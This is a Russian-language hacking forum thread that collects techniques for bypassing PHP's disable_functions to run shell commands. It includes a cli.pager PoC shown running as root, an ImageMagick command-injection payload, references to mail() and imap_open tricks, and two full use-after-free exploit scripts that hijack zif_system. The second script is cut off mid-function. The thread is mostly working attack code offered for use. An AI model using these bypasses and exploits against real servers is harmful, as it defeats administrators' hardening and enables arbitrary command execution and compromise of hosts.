Обход disable_functions в php-cli Имеем штатный набор php.ini Code: disable_functions=exec,passthru,shell_exec,system,proc_open..i.t.d который обламывает выполнение команд system('id'); Code: PHP Warning: system() has been disabled for security reasons in /home/root2/backtrick/test.php on line 2 нашел альтернативу здесь: https://github.com/php/php-src/blob/master/ext/readline/readline_cli.c Code: /* +----------------------------------------------------------------------+ | PHP Version 7 | +----------------------------------------------------------------------+ | Copyright (c) The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | [email protected] so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Author: Marcus Boerger <[email protected]> | | Johannes Schlueter <[email protected]> | +----------------------------------------------------------------------+ */ #ifdef HAVE_CONFIG_H #include "config.h" #endif #include "php.h" #ifndef HAVE_RL_COMPLETION_MATCHES #define rl_completion_matches completion_matches #endif #include "php_globals.h" #include "php_variables.h" #include "zend_hash.h" #include "zend_modules.h" #include "SAPI.h" #include <locale.h> #include "zend.h" #include "zend_extensions.h" #include "php_ini.h" #include "php_globals.h" #include "php_main.h" #include "fopen_wrappers.h" #include "ext/standard/php_standard.h" #include "zend_smart_str.h" #ifdef __riscos__ #include <unixlib/local.h> #endif #if HAVE_LIBEDIT #include <editline/readline.h> #else #include <readline/readline.h> #include <readline/history.h> #endif #include "zend_compile.h" #include "zend_execute.h" #include "zend_highlight.h" #include "zend_exceptions.h" #include "sapi/cli/cli.h" #include "readline_cli.h" #if defined(COMPILE_DL_READLINE) && !defined(PHP_WIN32) #include <dlfcn.h> #endif #ifndef RTLD_DEFAULT #define RTLD_DEFAULT NULL #endif #define DEFAULT_PROMPT "\\b \\> " ZEND_DECLARE_MODULE_GLOBALS(cli_readline); static char php_last_char = '\0'; static FILE *pager_pipe = NULL; static size_t readline_shell_write(const char *str, size_t str_length) /* {{{ */ { if (CLIR_G(prompt_str)) { smart_str_appendl(CLIR_G(prompt_str), str, str_length); return str_length; } if (CLIR_G(pager) && *CLIR_G(pager) && !pager_pipe) { pager_pipe = VCWD_POPEN(CLIR_G(pager), "w"); } if (pager_pipe) { return fwrite(str, 1, MIN(str_length, 16384), pager_pipe); } return -1; } /* }}} */ static size_t readline_shell_ub_write(const char *str, size_t str_length) /* {{{ */ { /* We just store the last char here and then pass back to the caller (sapi_cli_single_write in sapi/cli) which will actually write due to -1 return code */ php_last_char = str[str_length-1]; return (size_t) -1; } /* }}} */ static void cli_readline_init_globals(zend_cli_readline_globals *rg) { rg->pager = NULL; rg->prompt = NULL; rg->prompt_str = NULL; } PHP_INI_BEGIN() STD_PHP_INI_ENTRY("cli.pager", "", PHP_INI_ALL, OnUpdateString, pager, zend_cli_readline_globals, cli_readline_globals) STD_PHP_INI_ENTRY("cli.prompt", DEFAULT_PROMPT, PHP_INI_ALL, OnUpdateString, prompt, zend_cli_readline_globals, cli_readline_globals) PHP_INI_END() typedef enum { body, sstring, dstring, sstring_esc, dstring_esc, comment_line, comment_block, heredoc_start, heredoc, outside, } php_code_type; static zend_string *cli_get_prompt(char *block, char prompt) /* {{{ */ { smart_str retval = {0}; char *prompt_spec = CLIR_G(prompt) ? CLIR_G(prompt) : DEFAULT_PROMPT; do { if (*prompt_spec == '\\') { switch (prompt_spec[1]) { case '\\': smart_str_appendc(&retval, '\\'); prompt_spec++; break; case 'n': smart_str_appendc(&retval, '\n'); prompt_spec++; break; case 't': smart_str_appendc(&retval, '\t'); prompt_spec++; break; case 'e': smart_str_appendc(&retval, '\033'); prompt_spec++; break; case 'v': smart_str_appends(&retval, PHP_VERSION); prompt_spec++; break; case 'b': smart_str_appends(&retval, block); prompt_spec++; break; case '>': smart_str_appendc(&retval, prompt); prompt_spec++; break; case '`': smart_str_appendc(&retval, '`'); prompt_spec++; break; default: smart_str_appendc(&retval, '\\'); break; } } else if (*prompt_spec == '`') { char *prompt_end = strstr(prompt_spec + 1, "`"); char *code; if (prompt_end) { code = estrndup(prompt_spec + 1, prompt_end - prompt_spec - 1); CLIR_G(prompt_str) = &retval; zend_try { zend_eval_stringl(code, prompt_end - prompt_spec - 1, NULL, "php prompt code"); } zend_end_try(); CLIR_G(prompt_str) = NULL; efree(code); prompt_spec = prompt_end; } } else { smart_str_appendc(&retval, *prompt_spec); } } while (++prompt_spec && *prompt_spec); smart_str_0(&retval); return retval.s; } /* }}} */ static int cli_is_valid_code(char *code, size_t len, zend_string **prompt) /* {{{ */ { int valid_end = 1, last_valid_end; int brackets_count = 0; int brace_count = 0; size_t i; php_code_type code_type = body; char *heredoc_tag = NULL; size_t heredoc_len; for (i = 0; i < len; ++i) { switch(code_type) { default: switch(code[i]) { case '{': brackets_count++; valid_end = 0; break; case '}': if (brackets_count > 0) { brackets_count--; } valid_end = brackets_count ? 0 : 1; break; case '(': brace_count++; valid_end = 0; break; case ')': if (brace_count > 0) { brace_count--; } valid_end = 0; break; case ';': valid_end = brace_count == 0 && brackets_count == 0; break; case ' ': case '\r': case '\n': case '\t': break; case '\'': code_type = sstring; break; case '"': code_type = dstring; break; case '#': code_type = comment_line; break; case '/': if (code[i+1] == '/') { i++; code_type = comment_line; break; } if (code[i+1] == '*') { last_valid_end = valid_end; valid_end = 0; code_type = comment_block; i++; break; } valid_end = 0; break; case '?': if (code[i+1] == '>') { i++; code_type = outside; break; } valid_end = 0; break; case '<': valid_end = 0; if (i + 2 < len && code[i+1] == '<' && code[i+2] == '<') { i += 2; code_type = heredoc_start; heredoc_tag = NULL; heredoc_len = 0; } break; default: valid_end = 0; break; } break; case sstring: if (code[i] == '\\') { code_type = sstring_esc; } else { if (code[i] == '\'') { code_type = body; } } break; case sstring_esc: code_type = sstring; break; case dstring: if (code[i] == '\\') { code_type = dstring_esc; } else { if (code[i] == '"') { code_type = body; } } break; case dstring_esc: code_type = dstring; break; case comment_line: if (code[i] == '\n') { code_type = body; } break; case comment_block: if (code[i-1] == '*' && code[i] == '/') { code_type = body; valid_end = last_valid_end; } break; case heredoc_start: switch(code[i]) { case ' ': case '\t': case '\'': break; case '\r': case '\n': if (heredoc_tag) { code_type = heredoc; } else { /* Malformed heredoc without label */ code_type = body; } break; default: if (!heredoc_tag) { heredoc_tag = code+i; } heredoc_len++; break; } break; case heredoc: ZEND_ASSERT(heredoc_tag); if (code[i - (heredoc_len + 1)] == '\n' && !strncmp(code + i - heredoc_len, heredoc_tag, heredoc_len) && code[i] == '\n') { code_type = body; } else if (code[i - (heredoc_len + 2)] == '\n' && !strncmp(code + i - heredoc_len - 1, heredoc_tag, heredoc_len) && code[i-1] == ';' && code[i] == '\n') { code_type = body; valid_end = 1; } break; case outside: if ((CG(short_tags) && !strncmp(code+i-1, "<?", 2)) || (i > 3 && !strncmp(code+i-4, "<?php", 5)) ) { code_type = body; } break; } } switch (code_type) { default: if (brace_count) { *prompt = cli_get_prompt("php", '('); } else if (brackets_count) { *prompt = cli_get_prompt("php", '{'); } else { *prompt = cli_get_prompt("php", '>'); } break; case sstring: case sstring_esc: *prompt = cli_get_prompt("php", '\''); break; case dstring: case dstring_esc: *prompt = cli_get_prompt("php", '"'); break; case comment_block: *prompt = cli_get_prompt("/* ", '>'); break; case heredoc: *prompt = cli_get_prompt("<<<", '>'); break; case outside: *prompt = cli_get_prompt(" ", '>'); break; } if (!valid_end || brackets_count) { return 0; } else { return 1; } } /* }}} */ static char *cli_completion_generator_ht(const char *text, size_t textlen, int *state, HashTable *ht, void **pData) /* {{{ */ { zend_string *name; zend_ulong number; if (!(*state % 2)) { zend_hash_internal_pointer_reset(ht); (*state)++; } while(zend_hash_has_more_elements(ht) == SUCCESS) { zend_hash_get_current_key(ht, &name, &number); if (!textlen || !strncmp(ZSTR_VAL(name), text, textlen)) { if (pData) { *pData = zend_hash_get_current_data_ptr(ht); } zend_hash_move_forward(ht); return ZSTR_VAL(name); } if (zend_hash_move_forward(ht) == FAILURE) { break; } } (*state)++; return NULL; } /* }}} */ static char *cli_completion_generator_var(const char *text, size_t textlen, int *state) /* {{{ */ { char *retval, *tmp; zend_array *symbol_table = &EG(symbol_table); tmp = retval = cli_completion_generator_ht(text + 1, textlen - 1, state, symbol_table, NULL); if (retval) { retval = malloc(strlen(tmp) + 2); retval[0] = '$'; strcpy(&retval[1], tmp); rl_completion_append_character = '\0'; } return retval; } /* }}} */ static char *cli_completion_generator_ini(const char *text, size_t textlen, int *state) /* {{{ */ { char *retval, *tmp; tmp = retval = cli_completion_generator_ht(text + 1, textlen - 1, state, EG(ini_directives), NULL); if (retval) { retval = malloc(strlen(tmp) + 2); retval[0] = '#'; strcpy(&retval[1], tmp); rl_completion_append_character = '='; } return retval; } /* }}} */ static char *cli_completion_generator_func(const char *text, size_t textlen, int *state, HashTable *ht) /* {{{ */ { zend_function *func; char *retval = cli_completion_generator_ht(text, textlen, state, ht, (void**)&func); if (retval) { rl_completion_append_character = '('; retval = strdup(ZSTR_VAL(func->common.function_name)); } return retval; } /* }}} */ static char *cli_completion_generator_class(const char *text, size_t textlen, int *state) /* {{{ */ { zend_class_entry *ce; char *retval = cli_completion_generator_ht(text, textlen, state, EG(class_table), (void**)&ce); if (retval) { rl_completion_append_character = '\0'; retval = strdup(ZSTR_VAL(ce->name)); } return retval; } /* }}} */ static char *cli_completion_generator_define(const char *text, size_t textlen, int *state, HashTable *ht) /* {{{ */ { zend_class_entry **pce; char *retval = cli_completion_generator_ht(text, textlen, state, ht, (void**)&pce); if (retval) { rl_completion_append_character = '\0'; retval = strdup(retval); } return retval; } /* }}} */ static int cli_completion_state; static char *cli_completion_generator(const char *text, int index) /* {{{ */ { /* TODO: - constants - maybe array keys - language constructs and other things outside a hashtable (echo, try, function, class, ...) - object/class members - future: respect scope ("php > function foo() { $[tab]" should only expand to local variables...) */ char *retval = NULL; size_t textlen = strlen(text); if (!index) { cli_completion_state = 0; } if (text[0] == '$') { retval = cli_completion_generator_var(text, textlen, &cli_completion_state); } else if (text[0] == '#') { retval = cli_completion_generator_ini(text, textlen, &cli_completion_state); } else { char *lc_text, *class_name_end; zend_string *class_name = NULL; zend_class_entry *ce = NULL; class_name_end = strstr(text, "::"); if (class_name_end) { size_t class_name_len = class_name_end - text; class_name = zend_string_alloc(class_name_len, 0); zend_str_tolower_copy(ZSTR_VAL(class_name), text, class_name_len); if ((ce = zend_lookup_class(class_name)) == NULL) { zend_string_release_ex(class_name, 0); return NULL; } lc_text = zend_str_tolower_dup(class_name_end + 2, textlen - 2 - class_name_len); textlen -= (class_name_len + 2); } else { lc_text = zend_str_tolower_dup(text, textlen); } switch (cli_completion_state) { case 0: case 1: retval = cli_completion_generator_func(lc_text, textlen, &cli_completion_state, ce ? &ce->function_table : EG(function_table)); if (retval) { break; } case 2: case 3: retval = cli_completion_generator_define(text, textlen, &cli_completion_state, ce ? &ce->constants_table : EG(zend_constants)); if (retval || ce) { break; } case 4: case 5: retval = cli_completion_generator_class(lc_text, textlen, &cli_completion_state); break; default: break; } efree(lc_text); if (class_name) { zend_string_release_ex(class_name, 0); } if (ce && retval) { size_t len = ZSTR_LEN(ce->name) + 2 + strlen(retval) + 1; char *tmp = malloc(len); snprintf(tmp, len, "%s::%s", ZSTR_VAL(ce->name), retval); free(retval); retval = tmp; } } return retval; } /* }}} */ static char **cli_code_completion(const char *text, int start, int end) /* {{{ */ { return rl_completion_matches(text, cli_completion_generator); } /* }}} */ static int readline_shell_run(void) /* {{{ */ { char *line; size_t size = 4096, pos = 0, len; char *code = emalloc(size); zend_string *prompt = cli_get_prompt("php", '>'); char *history_file; int history_lines_to_write = 0; if (PG(auto_prepend_file) && PG(auto_prepend_file)[0]) { zend_file_handle *prepend_file_p; zend_file_handle prepend_file; memset(&prepend_file, 0, sizeof(prepend_file)); prepend_file.filename = PG(auto_prepend_file); prepend_file.opened_path = NULL; prepend_file.free_filename = 0; prepend_file.type = ZEND_HANDLE_FILENAME; prepend_file_p = &prepend_file; zend_execute_scripts(ZEND_REQUIRE, NULL, 1, prepend_file_p); } #ifndef PHP_WIN32 history_file = tilde_expand("~/.php_history"); #else spprintf(&history_file, MAX_PATH, "%s/.php_history", getenv("USERPROFILE")); #endif rl_attempted_completion_function = cli_code_completion; #ifndef PHP_WIN32 rl_special_prefixes = "$"; #endif read_history(history_file); EG(exit_status) = 0; while ((line = readline(ZSTR_VAL(prompt))) != NULL) { if (strcmp(line, "exit") == 0 || strcmp(line, "quit") == 0) { free(line); break; } if (!pos && !*line) { free(line); continue; } len = strlen(line); if (line[0] == '#') { char *param = strstr(&line[1], "="); if (param) { zend_string *cmd; param++; cmd = zend_string_init(&line[1], param - &line[1] - 1, 0); zend_alter_ini_entry_chars_ex(cmd, param, strlen(param), PHP_INI_USER, PHP_INI_STAGE_RUNTIME, 0); zend_string_release_ex(cmd, 0); add_history(line); zend_string_release_ex(prompt, 0); /* TODO: This might be wrong! */ prompt = cli_get_prompt("php", '>'); continue; } } if (pos + len + 2 > size) { size = pos + len + 2; code = erealloc(code, size); } memcpy(&code[pos], line, len); pos += len; code[pos] = '\n'; code[++pos] = '\0'; if (*line) { add_history(line); history_lines_to_write += 1; } free(line); zend_string_release_ex(prompt, 0); if (!cli_is_valid_code(code, pos, &prompt)) { continue; } if (history_lines_to_write) { #if HAVE_LIBEDIT write_history(history_file); #else append_history(history_lines_to_write, history_file); #endif history_lines_to_write = 0; } zend_try { zend_eval_stringl(code, pos, NULL, "php shell code"); } zend_end_try(); pos = 0; if (!pager_pipe && php_last_char != '\0' && php_last_char != '\n') { php_write("\n", 1); } if (EG(exception)) { zend_exception_error(EG(exception), E_WARNING); } if (pager_pipe) { fclose(pager_pipe); pager_pipe = NULL; } php_last_char = '\0'; } #ifdef PHP_WIN32 efree(history_file); #else free(history_file); #endif efree(code); zend_string_release_ex(prompt, 0); return EG(exit_status); } /* }}} */ #ifdef PHP_WIN32 typedef cli_shell_callbacks_t *(__cdecl *get_cli_shell_callbacks)(void); #define GET_SHELL_CB(cb) \ do { \ get_cli_shell_callbacks get_callbacks; \ HMODULE hMod = GetModuleHandle("php.exe"); \ (cb) = NULL; \ if (strlen(sapi_module.name) >= 3 && 0 == strncmp("cli", sapi_module.name, 3)) { \ get_callbacks = (get_cli_shell_callbacks)GetProcAddress(hMod, "php_cli_get_shell_callbacks"); \ if (get_callbacks) { \ (cb) = get_callbacks(); \ } \ } \ } while(0) #else /* #ifdef COMPILE_DL_READLINE This dlsym() is always used as even the CGI SAPI is linked against "CLI"-only extensions. If that is being changed dlsym() should only be used when building this extension sharedto offer compatibility. */ #define GET_SHELL_CB(cb) \ do { \ (cb) = NULL; \ cli_shell_callbacks_t *(*get_callbacks)(); \ get_callbacks = dlsym(RTLD_DEFAULT, "php_cli_get_shell_callbacks"); \ if (get_callbacks) { \ (cb) = get_callbacks(); \ } \ } while(0) /*#else #define GET_SHELL_CB(cb) (cb) = php_cli_get_shell_callbacks() #endif*/ #endif PHP_MINIT_FUNCTION(cli_readline) { cli_shell_callbacks_t *cb; ZEND_INIT_MODULE_GLOBALS(cli_readline, cli_readline_init_globals, NULL); REGISTER_INI_ENTRIES(); #if HAVE_LIBEDIT REGISTER_STRING_CONSTANT("READLINE_LIB", "libedit", CONST_CS|CONST_PERSISTENT); #else REGISTER_STRING_CONSTANT("READLINE_LIB", "readline", CONST_CS|CONST_PERSISTENT); #endif GET_SHELL_CB(cb); if (cb) { cb->cli_shell_write = readline_shell_write; cb->cli_shell_ub_write = readline_shell_ub_write; cb->cli_shell_run = readline_shell_run; } return SUCCESS; } PHP_MSHUTDOWN_FUNCTION(cli_readline) { cli_shell_callbacks_t *cb; UNREGISTER_INI_ENTRIES(); GET_SHELL_CB(cb); if (cb) { cb->cli_shell_write = NULL; cb->cli_shell_ub_write = NULL; cb->cli_shell_run = NULL; } return SUCCESS; } PHP_MINFO_FUNCTION(cli_readline) { php_info_print_table_start(); php_info_print_table_header(2, "Readline Support", "enabled"); #ifdef PHP_WIN32 php_info_print_table_row(2, "Readline library", "WinEditLine"); #else php_info_print_table_row(2, "Readline library", (rl_library_version ? rl_library_version : "Unknown")); #endif php_info_print_table_end(); DISPLAY_INI_ENTRIES(); } нас интересует Code: static size_t readline_shell_write(const char *str, size_t str_length) /* {{{ */ { if (CLIR_G(prompt_str)) { smart_str_appendl(CLIR_G(prompt_str), str, str_length); return str_length; } if (CLIR_G(pager) && *CLIR_G(pager) && !pager_pipe) { pager_pipe = VCWD_POPEN(CLIR_G(pager), "w"); } if (pager_pipe) { return fwrite(str, 1, MIN(str_length, 16384), pager_pipe); } return -1; } Code: STD_PHP_INI_ENTRY("cli.pager", "", PHP_INI_ALL, OnUpdateString, pager, zend_cli_readline_globals, cli_readline_globals) cli.pager - одна из дирректив readline https://www.php.net/manual/ru/readline.configuration.php poc: Code: <?php echo "system:".system('id'); ini_set('cli.pager','id;pwd'); print_r(readline_info()); проверяем: Code: php -d disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source test.php => Code: PHP Warning: system() has been disabled for security reasons in /home/root2/backtrick/test.php on line 2 system:Array ( [line_buffer] => [point] => 0 [end] => 0 [library_version] => EditLine wrapper [readline_name] => [attempted_completion_over] => 0 ) uid=0(root) gid=0(root) groups=0(root) /home/root2/backtrick php >=5.4.0
У функции mail() ещё есть пятый аргумент в котором указываются опции sendmail. С помощью этих опций тоже можно выполнить команду. Но тут всё зависит от реализации sendmail. На одном сервере она может предоставляться через postfix, на другом через exim. Сам этот метод ещё не пробовал, но видел статью в котором о нём рассказывается. Spoiler: Оффтоп Вообще через пятый аргумент mail() можно много чего наделать: https://www.saotn.org/exploit-phps-mail-get-remote-code-execution/
Если собирать обходы, то думаю имеет смысл напомнить еще про функцию imap(), которую разобрал crlf https://forum.antichat.ru/threads/463395/#post-4240723 https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
ImageMagick <= 6.9.3 (с пропатченным ImageTragick/GhostScript) PHP: new Imagick('scan:"|ls>/tmp/lol;"');
PHP 7.0-7.4 disable_functions bypass https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass Spoiler: README.md PHP 7.0-7.4 disable_functions bypass This exploit uses a two year old bug in debug_backtrace() function. We can trick it into returning a reference to a variable that has been destroyed, causing a use-after-free vulnerability. The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably. Targets 7.0 - all versions to date 7.1 - all versions to date 7.2 - all versions to date 7.3 - all versions to date 7.4 - all versions to date Spoiler: exploit.php PHP: <?php# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)## Bug: https://bugs.php.net/bug.php?id=76047# debug_backtrace() returns a reference to a variable# that has been destroyed, causing a UAF vulnerability.## This exploit should work on all PHP 7.0-7.4 versions# released as of 30/01/2020.## Author: https://github.com/mm0r1pwn("uname -a");function pwn($cmd) { global $abc, $helper, $backtrace; class Vuln { public $a; public function __destruct() { global $backtrace; unset($this->a); $backtrace = (new Exception)->getTrace(); # ;) if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 $backtrace = debug_backtrace(); } } } class Helper { public $a, $b, $c, $d; } function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = chr($v & 0xff); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } function trigger_uaf($arg) { # str_shuffle prevents opcache string interning $arg = str_shuffle(str_repeat('A', 79)); $vuln = new Vuln(); $vuln->a = $arg; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if UAF fails $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_shuffle(str_repeat('A', 79)); trigger_uaf('x'); $abc = $backtrace[1]['args'][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit();}
https://ssd-disclosure.com/ssd-advisory-php-spldoublylinkedlist-uaf-sandbox-escape/ https://bugs.php.net/bug.php?id=80111 Spoiler: exploit PHP: <?php## PHP SplDoublyLinkedList::offsetUnset UAF# Charles Fol (@cfreal_)# 2020-08-07# PHP is vulnerable from 5.3 to 8.0 alpha# This exploit only targets PHP7+.## SplDoublyLinkedList is a doubly-linked list (DLL) which supports iteration.# Said iteration is done by keeping a pointer to the "current" DLL element.# You can then call next() or prev() to make the DLL point to another element.# When you delete an element of the DLL, PHP will remove the element from the# DLL, then destroy the zval, and finally clear the current ptr if it points# to the element. Therefore, when the zval is destroyed, current is still# pointing to the associated element, even if it was removed from the list.# This allows for an easy UAF, because you can call $dll->next() or# $dll->prev() in the zval's destructor.# #error_reporting(E_ALL);define('NB_DANGLING', 200);define('SIZE_ELEM_STR', 40 - 24 - 1);define('STR_MARKER', 0xcf5ea1);function i2s(&$s, $p, $i, $x=8){ for($j=0;$j<$x;$j++) { $s[$p+$j] = chr($i & 0xff); $i >>= 8; }}function s2i(&$s, $p, $x=8){ $i = 0; for($j=$x-1;$j>=0;$j--) { $i <<= 8; $i |= ord($s[$p+$j]); } return $i;}class UAFTrigger{ function __destruct() { global $dlls, $strs, $rw_dll, $fake_dll_element, $leaked_str_offsets; #"print('UAF __destruct: ' . "\n"); $dlls[NB_DANGLING]->offsetUnset(0); # At this point every $dll->current points to the same freed chunk. We allocate # that chunk with a string, and fill the zval part $fake_dll_element = str_shuffle(str_repeat('A', SIZE_ELEM_STR)); i2s($fake_dll_element, 0x00, 0x12345678); # ptr i2s($fake_dll_element, 0x08, 0x00000004, 7); # type + other stuff # Each of these dlls current->next pointers point to the same location, # the string we allocated. When calling next(), our fake element becomes # the current value, and as such its rc is incremented. Since rc is at # the same place as zend_string.len, the length of the string gets bigger, # allowing to R/W any part of the following memory for($i = 0; $i <= NB_DANGLING; $i++) $dlls[$i]->next(); if(strlen($fake_dll_element) <= SIZE_ELEM_STR) die('Exploit failed: fake_dll_element did not increase in size'); $leaked_str_offsets = []; $leaked_str_zval = []; # In the memory after our fake element, that we can now read and write, # there are lots of zend_string chunks that we allocated. We keep three, # and we keep track of their offsets. for($offset = SIZE_ELEM_STR + 1; $offset <= strlen($fake_dll_element) - 40; $offset += 40) { # If we find a string marker, pull it from the string list if(s2i($fake_dll_element, $offset + 0x18) == STR_MARKER) { $leaked_str_offsets[] = $offset; $leaked_str_zval[] = $strs[s2i($fake_dll_element, $offset + 0x20)]; if(count($leaked_str_zval) == 3) break; } } if(count($leaked_str_zval) != 3) die('Exploit failed: unable to leak three zend_strings'); # free the strings, except the three we need $strs = null; # Leak adress of first chunk unset($leaked_str_zval[0]); unset($leaked_str_zval[1]); unset($leaked_str_zval[2]); $first_chunk_addr = s2i($fake_dll_element, $leaked_str_offsets[1]); # At this point we have 3 freed chunks of size 40, which we can read/write, # and we know their address. print('Address of first RW chunk: 0x' . dechex($first_chunk_addr) . "\n"); # In the third one, we will allocate a DLL element which points to a zend_array $rw_dll->push([3]); $array_addr = s2i($fake_dll_element, $leaked_str_offsets[2] + 0x18); # Change the zval type from zend_object to zend_string i2s($fake_dll_element, $leaked_str_offsets[2] + 0x20, 0x00000006); if(gettype($rw_dll[0]) != 'string') die('Exploit failed: Unable to change zend_array to zend_string'); # We can now read anything: if we want to read 0x11223300, we make zend_string* # point to 0x11223300-0x10, and read its size using strlen() # Read zend_array->pDestructor $zval_ptr_dtor_addr = read($array_addr + 0x30); print('Leaked zval_ptr_dtor address: 0x' . dechex($zval_ptr_dtor_addr) . "\n"); # Use it to find zif_system $system_addr = get_system_address($zval_ptr_dtor_addr); print('Got PHP_FUNCTION(system): 0x' . dechex($system_addr) . "\n"); # In the second freed block, we create a closure and copy the zend_closure struct # to a string $rw_dll->push(function ($x) {}); $closure_addr = s2i($fake_dll_element, $leaked_str_offsets[1] + 0x18); $data = str_shuffle(str_repeat('A', 0x200)); for($i = 0; $i < 0x138; $i += 8) { i2s($data, $i, read($closure_addr + $i)); } # Change internal func type and pointer to make the closure execute system instead i2s($data, 0x38, 1, 4); i2s($data, 0x68, $system_addr); # Push our string, which contains a fake zend_closure, in the last freed chunk that # we control, and make the second zval point to it. $rw_dll->push($data); $fake_zend_closure = s2i($fake_dll_element, $leaked_str_offsets[0] + 0x18) + 24; i2s($fake_dll_element, $leaked_str_offsets[1] + 0x18, $fake_zend_closure); print('Replaced zend_closure by the fake one: 0x' . dechex($fake_zend_closure) . "\n"); # Calling it now print('Running system("id");' . "\n"); $rw_dll[1]('id'); print_r('DONE'."\n"); }}class DanglingTrigger{ function __construct($i) { $this->i = $i; } function __destruct() { global $dlls; #D print('__destruct: ' . $this->i . "\n"); $dlls[$this->i]->offsetUnset(0); $dlls[$this->i+1]->push(123); $dlls[$this->i+1]->offsetUnset(0); }}class SystemExecutor extends ArrayObject{ function offsetGet($x) { parent::offsetGet($x); }}/** * Reads an arbitrary address by changing a zval to point to the address minus 0x10, * and setting its type to zend_string, so that zend_string->len points to the value * we want to read. */function read($addr, $s=8){ global $fake_dll_element, $leaked_str_offsets, $rw_dll; i2s($fake_dll_element, $leaked_str_offsets[2] + 0x18, $addr - 0x10); i2s($fake_dll_element, $leaked_str_offsets[2] + 0x20, 0x00000006); $value = strlen($rw_dll[0]); if($s != 8) $value &= (1 << ($s << 3)) - 1; return $value;}function get_binary_base($binary_leak){ $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = read($addr, 7); # ELF header if($leak == 0x10102464c457f) return $addr; } # We'll crash before this but it's clearer this way die('Exploit failed: Unable to find ELF header');}function parse_elf($base){ $e_type = read($base + 0x10, 2); $e_phoff = read($base + 0x20); $e_phentsize = read($base + 0x36, 2); $e_phnum = read($base + 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = read($header + 0x00, 4); $p_flags = read($header + 0x04, 4); $p_vaddr = read($header + 0x10); $p_memsz = read($header + 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) die('Exploit failed: Unable to parse ELF'); return [$data_addr, $text_size, $data_size];}function get_basic_funcs($base, $elf) { 